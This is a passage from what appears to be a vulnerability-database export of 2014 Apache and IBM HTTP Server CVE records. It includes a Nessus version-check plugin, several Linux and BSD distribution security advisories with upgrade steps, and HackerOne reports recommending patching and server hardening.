Vulnerabilities (509275)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of IBM HTTP Server running on the remote host is affected by multiple vulnerabilities, as follows:\n\n - Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to\ncause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential\ninformation or execute arbitrary code, via a crafted request that triggers improper scoreboard handling\nwithin the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker\nfunction in modules/lua/lua_request.c. (CVE-2014-0226)\n\n - The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which\nallows remote attackers to cause a denial of service (process hang) via a request to a CGI script that\ndoes not read from its stdin file descriptor. 
(CVE-2014-0231)\n\n - The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before\n2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service\n(resource consumption) via crafted request data that decompresses to a much larger size. (CVE-2014-0118)\n\n - The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass 'RequestHeader\nunset' directives by placing a header in the trailer portion of data sent with chunked transfer coding.\nNOTE: the vendor states 'this is not a security issue in httpd as such.' (CVE-2013-5704)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.ibm.com/support/pages/node/509275\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to IBM HTTP Server version 8.5.5.4, 8.0.0.10, 7.0.0.35 or later. 
Alternatively, upgrade to the minimal fix pack\nlevel required by the interim fix and then apply Interim Fix PI22070.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0226\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ibm_http_server_nix_installed.nbin\");\n script_require_keys(\"installed_sw/IBM HTTP Server\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'IBM HTTP Server';\nfix = 'Interim Fix PI22070';\n\napp_info = vcf::get_app_info(app:app);\nvcf::check_granularity(app_info:app_info, sig_segments:4);\n\n if ('PI22070' >< app_info['Fixes'])\n audit(AUDIT_INST_VER_NOT_VULN, app);\n\nconstraints = [\n { 'min_version' : '8.5.0.0', 'max_version' : '8.5.5.2', 'fixed_display' : '8.5.5.4 or Interim Fix PI22070'},\n { 'min_version' : '8.0.0.0', 'max_version' : '8.0.0.9', 'fixed_display' : '8.0.0.10 or Interim Fix PI22070'},\n { 'min_version' : '7.0.0.0', 'max_version' : '7.0.0.33', 'fixed_display' : '7.0.0.35 or Interim Fix PI22070'},\n { 'min_version' : '6.1.0.0.', 'max_version' : '6.1.0.47', 'fixed_display' : 'Interim Fix PI22070'},\n { 'min_version' : '6.0.2.0', 'max_version' : '6.0.2.43', 'fixed_display' : 'Interim Fix PI22070'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/httpd-2.4.10-i486-1_slack14.1.txz: Upgraded.\n This update fixes the following security issues:\n *) SECURITY: CVE-2014-0117 (cve.mitre.org)\n mod_proxy: Fix crash in Connection header handling which\n allowed a denial of service attack against a reverse proxy\n with a threaded MPM. 
[Ben Reser]\n *) SECURITY: CVE-2014-0118 (cve.mitre.org)\n mod_deflate: The DEFLATE input filter (inflates request bodies) now\n limits the length and compression ratio of inflated request bodies to\n avoid denial of service via highly compressed bodies. See directives\n DeflateInflateLimitRequestBody, DeflateInflateRatioLimit,\n and DeflateInflateRatioBurst. [Yann Ylavic, Eric Covener]\n *) SECURITY: CVE-2014-0226 (cve.mitre.org)\n Fix a race condition in scoreboard handling, which could lead to\n a heap buffer overflow. [Joe Orton, Eric Covener]\n *) SECURITY: CVE-2014-0231 (cve.mitre.org)\n mod_cgid: Fix a denial of service against CGI scripts that do\n not consume stdin that could lead to lingering HTTPD child processes\n filling up the scoreboard and eventually hanging the server. By\n default, the client I/O timeout (Timeout directive) now applies to\n communication with scripts. The CGIDScriptTimeout directive can be\n used to set a different timeout for communication with scripts.\n [Rainer Jung, Eric Covener, Yann Ylavic]\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0117\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.27-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.27-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.27-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.27-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.27-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.27-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.10-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.10-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.10-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.10-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.10-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.10-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.10-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2014-07-24T01:35:41", "published": "2014-07-24T01:35:41", "id": "SSA-2014-204-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.616658", "type": "slackware", "title": "[slackware-security] httpd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "mod_status buffer overflow, mod_proxy, mod_deflate, mod_cgid DoS.", "edition": 1, "modified": "2014-07-28T00:00:00", "published": 
"2014-07-28T00:00:00", "id": "SECURITYVULNS:VULN:13888", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13888", "title": "Apache multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2299-1\r\nJuly 23, 2014\r\n\r\napache2 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in Apache HTTP Server.\r\n\r\nSoftware Description:\r\n- apache2: Apache HTTP server\r\n\r\nDetails:\r\n\r\nMarek Kroemeke discovered that the mod_proxy module incorrectly handled\r\ncertain requests. A remote attacker could use this issue to cause the\r\nserver to stop responding, leading to a denial of service. This issue only\r\naffected Ubuntu 14.04 LTS. (CVE-2014-0117)\r\n\r\nGiancarlo Pellegrino and Davide Balzarotti discovered that the mod_deflate\r\nmodule incorrectly handled body decompression. A remote attacker could use\r\nthis issue to cause resource consumption, leading to a denial of service.\r\n(CVE-2014-0118)\r\n\r\nMarek Kroemeke and others discovered that the mod_status module incorrectly\r\nhandled certain requests. A remote attacker could use this issue to cause\r\nthe server to stop responding, leading to a denial of service, or possibly\r\nexecute arbitrary code. (CVE-2014-0226)\r\n\r\nRainer Jung discovered that the mod_cgid module incorrectly handled certain\r\nscripts. 
A remote attacker could use this issue to cause the server to stop\r\nresponding, leading to a denial of service. (CVE-2014-0231)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n apache2-bin 2.4.7-1ubuntu4.1\r\n\r\nUbuntu 12.04 LTS:\r\n apache2.2-bin 2.2.22-1ubuntu1.7\r\n\r\nUbuntu 10.04 LTS:\r\n apache2.2-bin 2.2.14-5ubuntu8.14\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2299-1\r\n CVE-2014-0117, CVE-2014-0118, CVE-2014-0226, CVE-2014-0231\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apache2/2.4.7-1ubuntu4.1\r\n https://launchpad.net/ubuntu/+source/apache2/2.2.22-1ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apache2/2.2.14-5ubuntu8.14\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2014-07-28T00:00:00", "published": "2014-07-28T00:00:00", "id": "SECURITYVULNS:DOC:30950", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30950", "title": "[USN-2299-1] Apache HTTP Server vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "Marek Kroemeke discovered that the mod_proxy module incorrectly handled \ncertain requests. A remote attacker could use this issue to cause the \nserver to stop responding, leading to a denial of service. This issue only \naffected Ubuntu 14.04 LTS. 
(CVE-2014-0117)\n\nGiancarlo Pellegrino and Davide Balzarotti discovered that the mod_deflate \nmodule incorrectly handled body decompression. A remote attacker could use \nthis issue to cause resource consumption, leading to a denial of service. \n(CVE-2014-0118)\n\nMarek Kroemeke and others discovered that the mod_status module incorrectly \nhandled certain requests. A remote attacker could use this issue to cause \nthe server to stop responding, leading to a denial of service, or possibly \nexecute arbitrary code. (CVE-2014-0226)\n\nRainer Jung discovered that the mod_cgid module incorrectly handled certain \nscripts. A remote attacker could use this issue to cause the server to stop \nresponding, leading to a denial of service. (CVE-2014-0231)", "edition": 5, "modified": "2014-07-23T00:00:00", "published": "2014-07-23T00:00:00", "id": "USN-2299-1", "href": "https://ubuntu.com/security/notices/USN-2299-1", "title": "Apache HTTP Server vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2014-08-15T02:47:11", "published": "2014-08-15T02:47:11", "id": "FEDORA:0CF762254E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: httpd-2.4.10-1.fc19", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0117", "CVE-2014-0118", "CVE-2014-0226", "CVE-2014-0231"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. 
", "modified": "2014-07-25T10:03:52", "published": "2014-07-25T10:03:52", "id": "FEDORA:BBF8021A28", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: httpd-2.4.10-1.fc20", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "description": "### Background\n\nApache HTTP Server is one of the most popular web servers on the Internet. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache HTTP Server. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.2.29\"", "edition": 1, "modified": "2015-04-19T00:00:00", "published": "2015-04-11T00:00:00", "id": "GLSA-201504-03", "href": "https://security.gentoo.org/glsa/201504-03", "type": "gentoo", "title": "Apache: Multiple vulnerabilities", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "description": "\nApache HTTP SERVER PROJECT reports:\n\n mod_deflate: The DEFLATE input filter (inflates request bodies) now\n\t limits the length and compression ratio of inflated request bodies to\n\t avoid denial of service via highly compressed bodies. 
See directives\n\t DeflateInflateLimitRequestBody, DeflateInflateRatioLimit, and\n\t DeflateInflateRatioBurst.\nmod_cgid: Fix a denial of service against CGI scripts that do not consume\n\t stdin that could lead to lingering HTTPD child processes filling up the\n\t scoreboard and eventually hanging the server. By default, the client I/O\n\t timeout (Timeout directive) now applies to communication with scripts. The\n\t CGIDScriptTimeout directive can be used to set a different timeout for\n\t communication with scripts.\nFix a race condition in scoreboard handling, which could lead to a heap\n\t buffer overflow.\ncore: HTTP trailers could be used to replace HTTP headers late during\n\t request processing, potentially undoing or otherwise confusing modules\n\t that examined or modified request headers earlier. Adds \"MergeTrailers\"\n\t directive to restore legacy behavior.\n\n", "edition": 4, "modified": "2014-09-03T00:00:00", "published": "2014-07-19T00:00:00", "id": "F927E06C-1109-11E4-B090-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/f927e06c-1109-11e4-b090-20cf30e32f6d.html", "title": "apache22 -- several vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:26", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-3523", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "\nApache HTTP SERVER PROJECT reports:\n\nmod_proxy: Fix crash in Connection header handling which allowed a\n\t denial of service attack against a reverse proxy with a threaded MPM.\nFix a race condition in scoreboard handling, which could lead to a\n\t heap buffer overflow.\nmod_deflate: The DEFLATE input filter (inflates request bodies) now\n\t limits the length and compression ratio of inflated request bodies to avoid\n\t denial of service via highly compressed bodies. 
See directives\n\t DeflateInflateLimitRequestBody, DeflateInflateRatioLimit,\n\t and DeflateInflateRatioBurst.\nmod_cgid: Fix a denial of service against CGI scripts that do\n\t not consume stdin that could lead to lingering HTTPD child processes\n\t filling up the scoreboard and eventually hanging the server. By\n\t default, the client I/O timeout (Timeout directive) now applies to\n\t communication with scripts. The CGIDScriptTimeout directive can be\n\t used to set a different timeout for communication with scripts.\n\n", "edition": 4, "modified": "2014-07-15T00:00:00", "published": "2014-07-15T00:00:00", "id": "4364E1F1-0F44-11E4-B090-20CF30E32F6D", "href": "https://vuxml.freebsd.org/freebsd/4364e1f1-0f44-11e4-b090-20cf30e32f6d.html", "title": "apache24 -- several vulnerabilities", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2018-04-19T17:34:11", "bulletinFamily": "bugbounty", "bounty": 80.0, "cvelist": ["CVE-2014-0231", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-0226"], "description": "###Issue Description\nThe researcher identified that the remote host is vulnerable to several denial of service vulnerabilities, however due to the nature of these issues the researcher did not attempt to generate a proof of concept. The information about these issues is based upon the version of apache that is running on the affected host being outdated.\nAdditionally it was noted that the affected host displays the default suse apache test page when visited over http or https as shown:\n\n{F118343}\n\nFrom the screencap it can clearly be seen that the test page is displayed. 
It was noted that there are several publicly available exploits for the vulnerabilities in this version of apache.\n\n###Response\n\n curl -I http://dolph2.booztx.com\n HTTP/1.1 403 Forbidden\n Date: Thu, 08 Sep 2016 15:18:14 GMT\n Server: Apache/2.2.15 (SuSE)\n Accept-Ranges: bytes\n Content-Length: 4002\n Connection: close\n Content-Type: text/html; charset=UTF-8\n\nFrom the response it can be seen that the version of apache running on the server is 2.2.15 (SuSE) which on further inspection was found to be vulnerable to the following CVEs based upon the version number:\n\n|CVE ID |\tRisk Score|\n| ----- | ------------|\n|[CVE-2013-5704](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2013-5704)\t|5.0 |\n|[CVE-2014-0118](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0118)\t|4.3 |\n|[CVE-2014-0226](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0226)\t|6.8 |\n|[CVE-2014-0231](https://www.cvedetails.com/cve-details.php?t=1&cve_id=CVE-2014-0231)\t|5 |\n\n\nFrom the CVEs in the table the following descriptions\n\n- The 'mod_headers' module contains an issue which could enable a remote attacker to inject arbitrary headers. This can be done by placing a header in the trailer portion of data being sent using chunked transfer encoding. (CVE-2013-5704)\n- The 'mod_deflate' module has an issue when handling highly compressed bodies. Using a specially crafted request, a remote attacker can exploit this to cause a denial of service by exhausting memory and CPU resources. (CVE-2014-0118)\n- The 'mod_status' module contains a race condition that can be triggered when handling the scoreboard. A remote attacker can exploit this to cause a denial of service, execute arbitrary code, or obtain sensitive credential information. (CVE-2014-0226)\n- The 'mod_cgid' module lacks a timeout mechanism. 
Using a specially crafted request, a remote attacker can use this flaw to cause a denial of service by causing child processes to linger indefinitely, eventually filling up the scoreboard. (CVE-2014-0231)\n\nThese issues were deemed the most high risk from the CVEs that affect the installed version, if Boozt are interested the consultant can provide a full list of CVEs that affect this version. \n\n###Affected URLs\n- dolph2.booztx.com\n \n###Risk Breakdown\nRisk: **High**\nDifficulty to Exploit: **Medium** \nAuthentication: **None**\n\n\n###Recommended Fix \nUpdate to the latest version of apache for SUSE which at the time of writing is [2.4](https://doc.opensuse.org/documentation/leap/reference/html/book.opensuse.reference/cha.apache2.html) additionally the server should be hardened to not disclose the version as can be seen in the example below:\n\nOpen `httpd.conf` in an editor, and change the following options:\n\n Header unset Server\n \n ServerSignature Off\n ServerTokens Prod\n\nAlso the default index page should be replaced with either a blank page or adapt the permissions of the domain to return 404/403 pages. For more information please see the apache [docs](http://httpd.apache.org/docs/2.4/mod/core.html#serversignature).", "modified": "2016-09-14T08:27:21", "published": "2016-09-08T15:44:15", "id": "H1:166871", "href": "https://hackerone.com/reports/166871", "type": "hackerone", "title": "Boozt Fashion AB: Instance of Apache Vulnerable to Several Issues", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:39:17", "bulletinFamily": "bugbounty", "bounty": 500.0, "cvelist": ["CVE-2014-0118"], "description": "A resource consumption flaw was found in mod_deflate. If request body decompression was configured (using the \"DEFLATE\" input filter), a remote attacker could cause the server to consume significant memory and/or CPU resources. 
The use of request body decompression is not a common configuration.\n\nAcknowledgements: This issue was reported by Giancarlo Pellegrino and Davide Balzarotti\n\nResolved in Apache httpd 2.4.10-dev: http://httpd.apache.org/security/vulnerabilities_24.html\n", "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "H1:20861", "href": "https://hackerone.com/reports/20861", "type": "hackerone", "title": "Apache httpd (IBB): moderate: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-5705", "CVE-2014-0098", "CVE-2013-6438", "CVE-2014-0226"], "description": "apache2:\n - ECC support was added to mod_ssl\n - fix for a race condition in mod_status known as CVE-2014-0226 can lead\n to information disclosure; mod_status is not active by default, and is\n normally only open for connects from localhost.\n - fix for bug known as CVE-2014-0098 that can crash the apache process if\n a specially designed cookie is sent to the server (log_cookie.c)\n - fix for crash bug in mod_dav known as CVE-2013-6438\n - fix for a problem with non-responsive CGI scripts that would otherwise\n cause the server to stall and deny service. CVE-2014-0231, new\n configuration parameter CGIDScriptTimeout defaults to 60s.\n\n apache2-mod_security2:\n - specially drafted chunked http requests allow an attacker to bypass\n filters configured in mod_security2. 
This vulnerability is known as\n CVE-2013-5705.\n\n", "edition": 1, "modified": "2014-08-07T23:04:14", "published": "2014-08-07T23:04:14", "id": "OPENSUSE-SU-2014:0969-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-08/msg00004.html", "title": "security issues addressed, most notably the mod_security heap overflow known as CVE-2014-0226 (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0098", "CVE-2013-6438", "CVE-2014-0226"], "description": "This apache2 update fixes the following security and non-security issues:\n\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * Support ECDH in Apache2 (bnc#859916)\n * apache fails to start with SSL on Xen kernel at boot time\n (bnc#852401)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "edition": 1, "modified": "2014-09-02T20:04:23", "published": "2014-09-02T20:04:23", "id": "SUSE-SU-2014:1081-1", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00001.html", "type": "suse", "title": "Security update for apache2 (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:43:03", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0098", "CVE-2013-6438", "CVE-2014-0226"], "description": "This update for the Apache Web Server provides the following fixes:\n\n * Fixed a heap-based buffer overflow on apache module mod_status.\n (bnc#887765, CVE-2014-0226)\n * Properly remove whitespace characters from CDATA sections to avoid\n remote denial of service by crashing the Apache Server process.\n (bnc#869105, CVE-2013-6438)\n * Correction to parsing of cookie content; this can lead to a crash\n with a specially designed cookie sent to the server. (bnc#869106,\n CVE-2014-0098)\n * ECC support should not be missing. (bnc#859916)\n\n This update also introduces a new configuration parameter\n CGIDScriptTimeout, which defaults to the value of parameter Timeout.\n CGIDScriptTimeout is set to 60s if mod_cgid is loaded/active, via\n /etc/apache2/conf.d/cgid-timeout.conf. The new directive and its effect\n prevent request workers to be eaten until starvation if cgi programs do\n not send output back to the server within the timeout set by\n CGIDScriptTimeout. 
(bnc#887768, CVE-2014-0231)\n\n Security Issues references:\n\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "edition": 1, "modified": "2014-08-07T01:04:17", "published": "2014-08-07T01:04:17", "id": "SUSE-SU-2014:0967-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-08/msg00003.html", "title": "Security update for the Apache Web Server (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:20:21", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2014-0098", "CVE-2013-6438", "CVE-2014-0226"], "description": "This apache2 update fixes the following security and non security issues:\n\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * Support ECDH in Apache2 (bnc#859916)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" 
